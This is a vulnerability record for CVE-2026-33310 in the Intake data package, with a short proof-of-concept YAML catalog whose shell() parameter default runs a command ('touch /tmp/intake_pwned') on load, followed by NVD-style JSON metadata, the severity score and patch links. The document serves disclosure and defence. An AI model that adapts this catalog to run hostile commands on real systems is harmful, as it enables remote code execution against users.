CVE-2026-33310

# PoC for CVE-2026-33310 # Save as malicious.yaml and load using intake.open_catalog('malicious.yaml') sources: malicious_source: driver: "csv" description: "Exploit for CVE-2026-33310" args: # Using shell() syntax in parameter default to execute command urlpath: "{{ shell('touch /tmp/intake_pwned') }}"

{"cve": {"id": "CVE-2026-33310", "sourceIdentifier": "[email protected]", "published": "2026-03-24T14:16:30.130", "lastModified": "2026-03-25T20:54:34.937", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Intake is a package for finding, investigating, loading and disseminating data. Prior to version 2.0.9, the shell() syntax within parameter default values appears to be automatically expanded during the catalog parsing process. If a catalog contains a parameter default such as shell(<command>), the command may be executed when the catalog source is accessed. This means that if a user loads a malicious catalog YAML, embedded commands could execute on the host system. Version 2.0.9 mitigates the issue by making getshell False by default everywhere."}, {"lang": "es", "value": "Intake es un paquete para encontrar, investigar, cargar y difundir datos. Antes de la versión 2.0.9, la sintaxis shell() dentro de los valores predeterminados de los parámetros parece expandirse automáticamente durante el proceso de análisis del catálogo. Si un catálogo contiene un valor predeterminado de parámetro como shell(), el comando puede ejecutarse cuando se accede a la fuente del catálogo. Esto significa que si un usuario carga un YAML de catálogo malicioso, los comandos incrustados podrían ejecutarse en el sistema anfitrión. La versión 2.0.9 mitiga el problema al establecer getshell en False por defecto en todas partes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intake:intake:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.9", "matchCriteriaId": "46D0915D-89C6-4029-A014-D5CF00C57F81"}]}]}], "references": [{"url": "https://github.com/intake/intake/commit/d0c0b6b57c1cb3f73880655ded4a9b0e18e1fd1b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/intake/intake/security/advisories/GHSA-37g4-qqqv-7m99", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}